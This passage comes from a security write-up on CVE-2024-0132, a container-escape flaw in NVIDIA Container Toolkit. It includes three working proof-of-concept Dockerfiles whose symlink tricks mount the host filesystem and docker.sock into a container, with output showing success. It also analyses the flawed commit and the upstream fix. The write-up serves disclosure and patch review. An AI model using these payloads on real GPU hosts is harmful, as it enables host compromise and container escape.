  3. (ym) A directory plus a file to construct two mounts: /usr/local/cuda/compat/libnvidia-cfg.so.111/libnvidia-cfg.so.112 -> / and /usr/local/cuda/compat/libnvidia-cfg.so.113 -> /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112

For the first two approaches (volume, procfs):

  1. Before entering the container's mount namespace, /volume or /proc under the container rootfs is an empty directory, satisfying steps 1, 2, 3 and 4.
  2. After entering the container's mount namespace, the /volume or /proc mount point becomes visible, with the symlink present underneath it.

For the third approach (two mounts):

  1. find_library_paths first collects all candidate paths and only afterwards performs the mounts, so a first mount can change the directory environment seen by a second mount.
  2. The paths found by find_library_paths may include directories.
  3. Before the mounts run, the directory /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/ does not exist, satisfying steps 1, 2, 3 and 4.
  4. After the directory /usr/local/cuda/compat/libnvidia-cfg.so.111 is mounted, /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112 is a symlink pointing at the host.

3.3.1 The volume method

  1. Construct a symlink: /usr/local/cuda/compat/libssst0n3.so.1 -> /volume/libnvidia-ml.so.999
  2. At container start, mount a volume in via the -v flag; the volume contains a symlink /volume/libnvidia-ml.so.999 -> /

The full PoC:

root@wanglei-gpu:~/poc# ls
Dockerfile  entrypoint.sh  volume
root@wanglei-gpu:~/poc# cat Dockerfile 
FROM ubuntu

RUN apt update && apt install curl -y

WORKDIR /usr/local/cuda/compat

RUN ln -s /volume/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /host

RUN ln -s /volume/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-run

COPY entrypoint.sh /

# for nvidia-container-toolkit <= v1.3.0, no need for > v1.3.0
ENV NVIDIA_DRIVER_CAPABILITIES=all

CMD /entrypoint.sh
root@wanglei-gpu:~/poc# cat entrypoint.sh 
#!/bin/bash
set -x
#echo '[+] mounted host files'
#echo '[+] reading /etc/hostname'
cat /host/etc/hostname
#echo 'mounted docker.sock; reading containers'
curl --unix-socket /host-run/docker.sock http://localhost/containers/json

root@wanglei-gpu:~/poc# ls -lah volume/
total 8.0K
drwxr-xr-x 2 root root 4.0K Dec 12 22:09 .
drwxr-xr-x 3 root root 4.0K Dec 12 22:08 ..
lrwxrwxrwx 1 root root    4 Dec 12 22:09 libnvidia-cfg.so.1 -> /run
lrwxrwxrwx 1 root root    1 Dec 12 22:02 libnvidia-ml.so.1 -> /
root@wanglei-gpu:~/poc# docker build -t ssst0n3/poc-cve-2024-0132:volume .
root@wanglei-gpu:~/poc# docker run -ti --runtime=nvidia --gpus=all -v $(pwd)/volume:/volume ssst0n3/poc-cve-2024-0132:volume
+ cat /host/etc/hostname
wanglei-gpu
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
[{"Id":"ad772936a25e694562d7f9f5378b8489981910442be2cd2953e5ca7a0aa022bd","Names":["/great_mayer"],"Image":"ssst0n3/poc-cve-2024-0132:volume","ImageID":"sha256:f416b61ba4d3c81d461f9be06faa60e754577f39fe5ca783dc68ae8ec8dc6b5d","Command":"/bin/sh -c /entrypoint.sh","Created":1734012735,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"6606e3b1ff3d29c359eed1804e08b6282ca905b13b579cc48f81575da5e4396b","EndpointID":"3fc07f3e7a9ba4a6ead11fddaf306af818d6994e86cab1783a4134a1b1adb846","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/root/poc/volume","Destination":"/volume","Mode":"","RW":true,"Propagation":"rprivate"}]}]

This achieves exploitation, but it requires a mounted volume. The next section uses procfs to cleverly remove the volume requirement.

3.3.2 The procfs method

Under the container's rootfs, /proc/1 belongs to the runc init process, and /proc/1/cwd points at the container's rootfs.

  1. Construct a symlink: /usr/local/cuda/compat/libssst0n3.so.1 -> /proc/1/cwd/libnvidia-ml.so.999
  2. Construct a symlink: /libnvidia-ml.so.999 -> /

The full PoC follows; the result is close to ideal:

root@wanglei-gpu:~/poc-procfs# cat Dockerfile 
FROM ubuntu

RUN apt update && apt install curl -y

WORKDIR /usr/local/cuda/compat

RUN ln -s /proc/1/cwd/usr/lib/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 && \
    ln -s / /usr/lib/libnvidia-ml.so.1 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /host

RUN ln -s /proc/1/cwd/usr/lib64/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 && \
    ln -s /run /usr/lib64/libnvidia-cfg.so.1 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-run

COPY entrypoint.sh /

# for nvidia-container-toolkit <= v1.3.0, no need for > v1.3.0
ENV NVIDIA_DRIVER_CAPABILITIES=all

CMD /entrypoint.sh
root@wanglei-gpu:~/poc-procfs# cat entrypoint.sh 
#!/bin/bash
set -x
#echo '[+] mounted host files'
#echo '[+] reading /etc/hostname'
cat /host/etc/hostname
#echo 'mounted docker.sock; reading containers'
curl --unix-socket /host-run/docker.sock http://localhost/containers/json
root@wanglei-gpu:~/poc-procfs# ls
Dockerfile  entrypoint.sh
root@wanglei-gpu:~/poc-procfs# docker build -t ssst0n3/poc-cve-2024-0132:proc .
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit:
            https://docs.docker.com/go/buildx/

Sending build context to Docker daemon  3.584kB
Step 1/8 : FROM ubuntu
 ---> b1d9df8ab815
Step 2/8 : RUN apt update && apt install curl -y
 ---> Using cache
 ---> 22cff36a341c
Step 3/8 : WORKDIR /usr/local/cuda/compat
 ---> Using cache
 ---> d13208243e8f
Step 4/8 : RUN ln -s /proc/1/cwd/usr/lib/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 &&     ln -s / /usr/lib/libnvidia-ml.so.1 &&     ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /host
 ---> Using cache
 ---> 6371e6b56cab
Step 5/8 : RUN ln -s /proc/1/cwd/usr/lib64/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 &&     ln -s /run /usr/lib64/libnvidia-cfg.so.1 &&     ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-run
 ---> Running in 6d3f1fb775b2
Removing intermediate container 6d3f1fb775b2
 ---> 24cfef3630d3
Step 6/8 : COPY entrypoint.sh /
 ---> 473de3b01d8f
Step 7/8 : ENV NVIDIA_DRIVER_CAPABILITIES=all
 ---> Running in 215739d1c861
Removing intermediate container 215739d1c861
 ---> ab62217ce62b
Step 8/8 : CMD /entrypoint.sh
 ---> Running in 358b01f5a7e5
Removing intermediate container 358b01f5a7e5
 ---> e8b3b6adb292
Successfully built e8b3b6adb292
Successfully tagged ssst0n3/poc-cve-2024-0132:proc
root@wanglei-gpu:~# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132:proc
+ cat /host/etc/hostname
wanglei-gpu
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
[{"Id":"a84e9812921f2a49541982607b0488f3b9bc8bd04ae074c6b65f5546761a1367","Names":["/keen_wu"],"Image":"ssst0n3/poc-cve-2024-0132:proc","ImageID":"sha256:e8b3b6adb292f3732662e09d721b6ae20d52b4e8d3ae54037917d3fcae6d1418","Command":"/bin/sh -c /entrypoint.sh","Created":1734014316,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"6606e3b1ff3d29c359eed1804e08b6282ca905b13b579cc48f81575da5e4396b","EndpointID":"bf50a193cce8ba008eb132b957d511300b626e85b0d8e3150d4264a6da75e19d","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]
3.3.3 The two-mounts method

  1. Construct a symlink: /usr/local/cuda/compat/libnvidia-cfg.so.111/libnvidia-cfg.so.112 -> /
  2. Construct a symlink: /usr/local/cuda/compat/libnvidia-cfg.so.113 -> /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112

The full PoC follows; this variant also works nicely:

root@wanglei-gpu:~/poc-2mounts# cat Dockerfile 
FROM ubuntu

RUN apt update && apt install curl -y

WORKDIR /usr/local/cuda/compat

RUN mkdir libnvidia-cfg.so.111 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112 libnvidia-cfg.so.113 && \
    ln -s /run libnvidia-cfg.so.111/libnvidia-cfg.so.112 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.112 /host-run

CMD sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/json
root@wanglei-gpu:~/poc-2mounts# docker build -t ssst0n3/poc-cve-2024-0132-ym .
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit:
            https://docs.docker.com/go/buildx/

Sending build context to Docker daemon  3.072kB
Step 1/5 : FROM ubuntu
 ---> b1d9df8ab815
Step 2/5 : RUN apt update && apt install curl -y
 ---> Using cache
 ---> 77fb95a6fc52
Step 3/5 : WORKDIR /usr/local/cuda/compat
 ---> Using cache
 ---> 311a3960cc5f
Step 4/5 : RUN mkdir libnvidia-cfg.so.111 &&     ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112 libnvidia-cfg.so.113 &&     ln -s /run libnvidia-cfg.so.111/libnvidia-cfg.so.112 &&     ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.112 /host-run
 ---> Using cache
 ---> dcc8fbd93574
Step 5/5 : CMD sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/json
 ---> Using cache
 ---> fc14d064757d
Successfully built fc14d064757d
Successfully tagged ssst0n3/poc-cve-2024-0132-ym:latest
root@wanglei-gpu:~/poc-2mounts# docker run -ti --rm --runtime nvidia --gpus=all ssst0n3/poc-cve-2024-0132-ym
[{"Id":"d45013b4c5293030f9c01929e81b69d1af0d676a44d230710c8a97baef394758","Names":["/friendly_perlman"],"Image":"ssst0n3/poc-cve-2024-0132-ym","ImageID":"sha256:fc14d064757d9b17bf6454e06fe63af49f17fbd95391158908625142def35c86","Command":"/bin/sh -c 'sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/json'","Created":1736862952,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"c4573489d87e5162cf69495fcb6a4bb879c152012853d98d8ab202b0bf13e755","EndpointID":"a73ef57a093f3c18a4d0df8c5bc29f4b3d104e4653ce45a63216b81dc010dec1","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]

4. Why /proc/self/cwd cannot be used

/proc/self is a symlink pointing at /proc/<PID of the current process>.

Entering only the mount namespace switches the filesystem view (including /proc) to the container's, but the process remains in the host's PID namespace, so /proc/self cannot be resolved.

The problem can be reduced to entering the container's mount namespace with nsenter -m, where /proc/self turns out to be inaccessible:

root@wanglei-gpu:~# docker run -tid ubuntu sleep 7777
70c6ac9b97277217e13fecbc8ac8754e569b83b33a871236493a10b5ad291ca3
root@wanglei-gpu:~# ps -ef |grep 7777
root       30697   30677  0 22:51 pts/0    00:00:00 sleep 7777
root       30720   23331  0 22:51 pts/0    00:00:00 grep --color=auto 7777
root@wanglei-gpu:~# nsenter -t 30697 -m
root@wanglei-gpu:/# ls -lahd proc/1
dr-xr-xr-x 9 root root 0 Dec 12 14:51 proc/1
root@wanglei-gpu:/# ls -lahd proc/self
ls: cannot read symbolic link 'proc/self': No such file or directory
lrwxrwxrwx 1 root root 0 Dec 12 14:51 proc/self
root@wanglei-gpu:/# stat proc/self
  File: proc/self
stat: cannot read symbolic link 'proc/self': No such file or directory

  Size: 0          Blocks: 0          IO Block: 1024   symbolic link
Device: 0,65 Inode: 4026531842  Links: 1
Access: (0777/lrwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-12-12 14:51:50.626149745 +0000
Modify: 2024-12-12 14:51:50.538149127 +0000
Change: 2024-12-12 14:51:50.538149127 +0000
 Birth: -
root@wanglei-gpu:/# stat proc/1
  File: proc/1
  Size: 0          Blocks: 0          IO Block: 1024   directory
Device: 0,65 Inode: 224269      Links: 9
Access: (0555/dr-xr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-12-12 14:51:50.626149745 +0000
Modify: 2024-12-12 14:51:50.626149745 +0000
Change: 2024-12-12 14:51:50.626149745 +0000
 Birth: -

But if the PID namespace is entered as well, /proc/self becomes accessible, while the parent nsenter process remains invisible inside the container:

root@wanglei-gpu:~# nsenter -t 30697 -m -p
root@wanglei-gpu:/# cat /proc/self/status 
Name: cat
Umask: 0022
State: R (running)
Tgid: 53015
Ngid: 0
Pid: 53015
PPid: 52992
...
root@wanglei-gpu:/# cat /proc/52992/status
Name: bash
Umask: 0022
State: S (sleeping)
Tgid: 52992
Ngid: 0
Pid: 52992
PPid: 0
...

5. Why CDI mode is not affected

According to section "2.6 nvidia-container-runtime-hook invokes nvidia-container-cli", the CUDA forward-compatibility feature is exercised through the nvidia-container-cli configure command.

As described in section "2.4 What nvidia-container-runtime actually modifies in the spec", CDI mode does not invoke nvidia-container-cli configure.

All of the configuration has already been merged into the spec; it comes from /etc/cdi/nvidia.yaml, for example:

---
cdiVersion: 0.5.0
containerEdits:
  deviceNodes:
  - path: /dev/nvidia-modeset
  - path: /dev/nvidia-uvm
  - path: /dev/nvidia-uvm-tools
  - path: /dev/nvidiactl
  env:
  - NVIDIA_VISIBLE_DEVICES=void
  hooks:
  - args:
    - nvidia-cdi-hook
    - create-symlinks
    - --link
    - libnvidia-allocator.so.470.223.02::/usr/lib/x86_64-linux-gnu/libnvidia-allocator.so.1
    - --link
    - ../libnvidia-allocator.so.1::/usr/lib/x86_64-linux-gnu/gbm/nvidia-drm_gbm.so
    - --link
    - libnvidia-vulkan-producer.so.470.223.02::/usr/lib/x86_64-linux-gnu/libnvidia-vulkan-producer.so
    - --link
    - libglxserver_nvidia.so.470.223.02::/usr/lib/xorg/modules/extensions/libglxserver_nvidia.so
    hookName: createContainer
    path: /usr/bin/nvidia-cdi-hook
  - args:
    - nvidia-cdi-hook
    - update-ldcache
    - --folder
    - /usr/lib/x86_64-linux-gnu
    hookName: createContainer
    path: /usr/bin/nvidia-cdi-hook
  mounts:
  - containerPath: /run/nvidia-persistenced/socket
    hostPath: /run/nvidia-persistenced/socket
    options:
    - ro
    - nosuid
    - nodev
    - bind
    - noexec
  ...
  - containerPath: /usr/bin/nvidia-persistenced
    hostPath: /usr/bin/nvidia-persistenced
    options:
    - ro
    - nosuid
    - nodev
    - bind
  - containerPath: /usr/bin/nvidia-smi
    hostPath: /usr/bin/nvidia-smi
    options:
    - ro
    - nosuid
    - nodev
    - bind
  ...
devices:
- containerEdits:
    deviceNodes:
    - path: /dev/nvidia0
    - path: /dev/dri/card1
    - path: /dev/dri/renderD128
    hooks:
    - args:
      - nvidia-cdi-hook
      - create-symlinks
      - --link
      - ../card1::/dev/dri/by-path/pci-0000:00:0d.0-card
      - --link
      - ../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render
      hookName: createContainer
      path: /usr/bin/nvidia-cdi-hook
    ...
  name: "0"
- containerEdits:
    deviceNodes:
    - path: /dev/nvidia0
    - path: /dev/dri/card1
    - path: /dev/dri/renderD128
    hooks:
    - args:
      - nvidia-cdi-hook
      - create-symlinks
      - --link
      - ../card1::/dev/dri/by-path/pci-0000:00:0d.0-card
      - --link
      - ../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render
      hookName: createContainer
      path: /usr/bin/nvidia-cdi-hook
    ...
  name: GPU-86fd03a3-2937-0c87-3dff-26be693ec102
- containerEdits:
    deviceNodes:
    - path: /dev/nvidia0
    - path: /dev/dri/card1
    - path: /dev/dri/renderD128
    hooks:
    - args:
      - nvidia-cdi-hook
      - create-symlinks
      - --link
      - ../card1::/dev/dri/by-path/pci-0000:00:0d.0-card
      - --link
      - ../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render
      hookName: createContainer
      path: /usr/bin/nvidia-cdi-hook
    ...
  name: all
kind: nvidia.com/gpu

八、Vulnerability Introduction Analysis

commit#35a9f27(https://github.com/NVIDIA/libnvidia-container/commit/35a9f27c0200d74fdccc43f893253439d1b969a5#diff-082d73ee31e0c92eac8fe9324cd6dca676357264ec3d36f934ba718dae93f6d1)

The commit is a plain feature implementation that overlooked two points:

  1. Mounting a file from the container into the container is a sensitive operation
  2. No restriction was placed on symlinks (hard to anticipate for a developer unfamiliar with container security)

九、Vulnerability Fix Analysis

1. Analysis of the fix

PR#282

1.1 New function mount_in_root

The added mount_in_root function returns an error if the destination path resolves outside the rootfs.

https://github.com/NVIDIA/libnvidia-container/commit/ad1f8c8ac4a31bef69c82958f3a87456ceaa39c8?diff=unified#diff-ad502ebe98b15d295b76f88ec8ff917a249b05151a3191db41e43f0390c70b2dR69-R77

src/nvc_mount.c

+static char *mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path, uid_t uid, uid_t gid, unsigned long mountflags);

+// mount_in_root bind mounts the specified src to the specified location in a root.
+// If the destination resolves outside of the root an error is raised.
+static char *
+mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path, uid_t uid, uid_t gid, unsigned long mountflags) {
+       char dst[PATH_MAX];
+       if (path_resolve_full(err, dst, rootfs, path) < 0)
+               return (NULL);
+       return mount_with_flags(err, src, dst, uid, gid, mountflags);
+}
For reference, mount_in_root relies on path_resolve_full, whose underlying do_path_resolve resolves the destination strictly beneath the given root:

int
path_resolve_full(struct error *err, char *buf, const char *root, const char *path)
{
        return (do_path_resolve(err, true, buf, root, path));
}

static int
do_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path)
{
        int fd = -1;
        int rv = -1;
        char realpath[PATH_MAX];
        char dbuf[2][PATH_MAX];
        char *link = dbuf[0];
        char *ptr = dbuf[1];
        char *file, *p;
        unsigned int noents = 0;
        unsigned int nlinks = 0;
        ssize_t n;

        *ptr = '\0';
        *realpath = '\0';
        assert(*root == '/');

        if ((fd = open_next(err, -1, root)) < 0)
                goto fail;
        if (path_append(err, ptr, path) < 0)
                goto fail;

        while ((file = strsep(&ptr, "/")) != NULL) {
                if (*file == '\0' || str_equal(file, "."))
                        continue;
                else if (str_equal(file, "..")) {
                        /*
                         * Remove the last component from the resolved path. If we are not below
                         * non-existent components, restore the previous file descriptor as well.
                         */

                        if ((p = strrchr(realpath, '/')) == NULL) {
                                error_setx(err, "path error: %s resolves outside of %s", path, root);
                                goto fail;
                        }
                        *p = '\0';
                        if (noents > 0)
                                --noents;
                        else {
                                if ((fd = open_next(err, fd, "..")) < 0)
                                        goto fail;
                        }
                } else {
                        if (noents > 0)
                                goto missing_ent;

                        n = readlinkat(fd, file, link, PATH_MAX);
                        if (n > 0 && n < PATH_MAX && nlinks < MAXSYMLINKS) {
                                /*
                                 * Component is a symlink, append the rest of the path to it and
                                 * proceed with the resulting buffer. If it is absolute, also clear
                                 * the resolved path and reset our file descriptor to root.
                                 */

                                link[n] = '\0';
                                if (*link == '/') {
                                        ++link;
                                        *realpath = '\0';
                                        if ((fd = open_next(err, fd, root)) < 0)
                                                goto fail;
                                }
                                if (ptr != NULL) {
                                        if (path_append(err, link, ptr) < 0)
                                                goto fail;
                                }
                                ptr = link;
                                link = dbuf[++nlinks % 2];
                        } else {
                                if (n >= PATH_MAX)
                                        errno = ENAMETOOLONG;
                                else if (nlinks >= MAXSYMLINKS)
                                        errno = ELOOP;
                                switch (errno) {
                                missing_ent:
                                case ENOENT:
                                        /* Component doesn't exist */
                                        ++noents;
                                        if (path_append(err, realpath, file) < 0)
                                                goto fail;
                                        break;
                                case EINVAL:
                                        /* Not a symlink, proceed normally */
                                        if ((fd = open_next(err, fd, file)) < 0)
                                                goto fail;
                                        if (path_append(err, realpath, file) < 0)
                                                goto fail;
                                        break;
                                default:
                                        error_set(err, "path error: %s/%s", root, path);
                                        goto fail;
                                }
                        }
                }
        }

        if (!full) {
                if (path_new(err, buf, realpath) < 0)
                        goto fail;
        } else {
                if (path_join(err, buf, root, realpath) < 0)
                        goto fail;
        }
        rv = 0;

 fail:
        xclose(fd);
        return (rv);
}

1.2 Replacing mount_with_flags with mount_in_root

src/nvc_mount.c

static char *
mount_directory(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir)
{
        char src[PATH_MAX];
-       char dst[PATH_MAX];
        if (path_join(err, src, root, dir) < 0)
                return (NULL);
-       if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)
-               return (NULL);
-       return mount_with_flags(err, src, dst, cnt->uid, cnt->gid, MS_NOSUID|MS_NOEXEC);
+       return mount_in_root(err, src, cnt->cfg.rootfs, dir, cnt->uid, cnt->gid, MS_NOSUID|MS_NOEXEC);
}

// mount_firmware mounts the specified firmware file. The path specified is the container path and is resolved
// on the host before mounting.
static char *
mount_firmware(struct error *err, const char *root, const struct nvc_container *cnt, const char *container_path)
{
        char src[PATH_MAX];
-       char dst[PATH_MAX];
        if (path_resolve_full(err, src, root, container_path) < 0)
                return (NULL);
-       if (path_join(err, dst, cnt->cfg.rootfs, container_path) < 0)
-               return (NULL);
+       return mount_in_root(err, src, cnt->cfg.rootfs, container_path, cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID);
}

1.3 New function file_mode_nofollow

Compared with file_mode, file_mode_nofollow replaces stat with lstat so that symlinks are not followed (a small stat/lstat demo follows the diffs below).

src/utils.h

+int  file_mode_nofollow(struct error *, const char *, mode_t *);

src/utils.c

+// file_mode_nofollow implements the same functionality as file_mode except that
+// in that case of a symlink, the file is not followed and the mode of the
+// original file is returned.
+int
+file_mode_nofollow(struct error *err, const char *path, mode_t *mode)
+{
+       struct stat s;
+       if (xlstat(err, path, &s) < 0)
+               return (-1);
+       *mode = s.st_mode;
+       return (0);
+}

src/xfuncs.h

+static inline int  xlstat(struct error *, const char *, struct stat *);
...
+static inline int
+xlstat(struct error *err, const char *path, struct stat *buf)
+{
+        int rv;
+        if ((rv = lstat(path, buf)) < 0)
+                error_set(err, "lstat failed: %s", path);
+        return (rv);
+}
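
A tiny standalone demo (hypothetical /tmp path) of the stat(2)/lstat(2) difference the fix builds on: only lstat reports the link itself, which is what lets the patched mount_files() reject symlinked sources:

#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
        struct stat s;
        symlink("/etc/passwd", "/tmp/demo-link");           /* link -> regular file */
        stat("/tmp/demo-link", &s);                         /* follows the link */
        printf("stat : S_ISLNK=%d\n", S_ISLNK(s.st_mode));  /* prints 0 */
        lstat("/tmp/demo-link", &s);                        /* inspects the link itself */
        printf("lstat: S_ISLNK=%d\n", S_ISLNK(s.st_mode));  /* prints 1 */
        unlink("/tmp/demo-link");
        return (0);
}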

1.4 Replacing file_mode with file_mode_nofollow

static char **
mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size)
{
        char src[PATH_MAX];
        char dst[PATH_MAX];
        mode_t mode;
        char *src_end, *dst_end, *file;
        char **mnt, **ptr;

        if (path_new(err, src, root) < 0)
                return (NULL);
        if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)
                return (NULL);
        if (file_create(err, dst, NULL, cnt->uid, cnt->gid, MODE_DIR(0755)) < 0)
                return (NULL);
+       if (path_new(err, dst, dir) < 0)
+               return (NULL);
        src_end = src + strlen(src);
        dst_end = dst + strlen(dst);

        mnt = ptr = array_new(err, size + 1); /* NULL terminated. */
        if (mnt == NULL)
                return (NULL);

        for (size_t i = 0; i < size; ++i) {
                file = basename(paths[i]);
                if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags))
                        continue;
                if (path_append(err, src, paths[i]) < 0)
                        goto fail;
-               if (path_append(err, dst, file) < 0)
-                       goto fail;
-               if (file_mode(err, src, &mode) < 0)
+               if (file_mode_nofollow(err, src, &mode) < 0)
                        goto fail;
-               if (file_create(err, dst, NULL, cnt->uid, cnt->gid, mode) < 0)
+               // If we encounter resolved directories or symlinks here, we raise an error.
+               if (S_ISDIR(mode) || S_ISLNK(mode)) {
+                       error_setx(err, "unexpected source file mode %o for %s", mode, paths[i]);
                        goto fail;
-               log_infof("mounting %s at %s", src, dst);
-               if (xmount(err, src, dst, NULL, MS_BIND, NULL) < 0)
-                       goto fail;
-               if (xmount(err, NULL, dst, NULL, MS_BIND|MS_REMOUNT | MS_RDONLY|MS_NODEV|MS_NOSUID, NULL) < 0)
+               }
+               if (path_append(err, dst, file) < 0)
                        goto fail;
-               if ((*ptr++ = xstrdup(err, dst)) == NULL)
+               if ((*ptr++ = mount_in_root(err, src, cnt->cfg.rootfs, dst, cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID)) == NULL)
                        goto fail;
                *src_end = '\0';
                *dst_end = '\0';
        }
        return (mnt);

 fail:
        for (size_t i = 0; i < size; ++i)
                unmount(mnt[i]);
        array_free(mnt, size);
        return (NULL);
}

src/utils.c

int
file_create(struct error *err, const char *path, const char *data, uid_t uid, gid_t gid, mode_t mode)
{
        char *p;
        uid_t euid;
        gid_t egid;
        mode_t perm;
        int fd;
        size_t size;
        int flags = O_NOFOLLOW|O_CREAT;
        int rv = -1;

        // We check whether the file already exists with the required mode and skip the creation.
-       if (data == NULL && file_mode(err, path, &perm) == 0) {
+       if (data == NULL && file_mode_nofollow(err, path, &perm) == 0) {
                if (perm == mode) {
-                       log_errf("The path %s already exists with the required mode; skipping create", path);
+                       log_warnf("The path %s already exists with the required mode; skipping create", path);
                        return (0);
                }
        }

        if ((p = xstrdup(err, path)) == NULL)
                return (-1);

        /*
         * Change the filesystem UID/GID before creating the file to support user namespaces.
         * This is required since Linux 4.8 because the inode needs to be created with a UID/GID known to the VFS.
         */
        euid = geteuid();
        egid = getegid();
        if (set_fsugid(uid, gid) < 0)
                goto fail;

        perm = (0777 & ~get_umask()) | S_IWUSR | S_IXUSR;
        if (make_ancestors(dirname(p), perm) < 0)
                goto fail;
        perm = 0777 & ~get_umask() & mode;

        if (S_ISDIR(mode)) {
                if (mkdir(path, perm) < 0 && errno != EEXIST)
                        goto fail;
        } else if (S_ISLNK(mode)) {
                if (data == NULL) {
                        errno = EINVAL;
                        goto fail;
                }
                if (symlink(data, path) < 0 && errno != EEXIST)
                        goto fail;
        } else {
                if (data != NULL) {
                        size = strlen(data);
                        flags |= O_WRONLY|O_TRUNC;
                }
                if ((fd = open(path, flags, perm)) < 0) {
                        if (errno == ELOOP)
                                errno = EEXIST; /* XXX Better error message if the file exists and is a symlink. */
                        goto fail;
                }
                if (data != NULL && write(fd, data, size) < (ssize_t)size) {
                        close(fd);
                        goto fail;
                }
                close(fd);
        }
        rv = 0;

 fail:
        if (rv < 0)
                error_set(err, "file creation failed: %s", path);

        assert_func(set_fsugid(euid, egid));
        free(p);
        return (rv);
}
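
A side note on the non-directory branch above: open(2) with O_NOFOLLOW fails with ELOOP when the final path component is a symlink, which is exactly what the errno == ELOOP remapping handles. A tiny sketch (mine, not from the patch):

/* Sketch (not from the patch): O_NOFOLLOW makes open() fail with
 * ELOOP when the last path component is a symlink; file_create()
 * remaps this to EEXIST for a clearer error message. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
        if (symlink("/etc/passwd", "demo-link") < 0)
                return 1;
        if (open("demo-link", O_RDONLY | O_NOFOLLOW) < 0 && errno == ELOOP)
                puts("open(O_NOFOLLOW) on a symlink fails with ELOOP");
        unlink("demo-link");
        return 0;
}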

2. Fix Verification

2.1 Reproduction Environment

The environment is the same as in "六、漏洞复现 - 1. nvidia-container-toolkit - 1.1 复现环境" (Section 6, the vulnerability-reproduction environment).

Install docker and nvidia-container-toolkit:

root@wanglei-gpu:~# apt update && apt install docker.io -y
root@wanglei-gpu:~# curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \
    && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list | \
    sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \
    tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
root@wanglei-gpu:~# apt-get update && \
    apt-get install -y libnvidia-container1=1.16.2-1 \
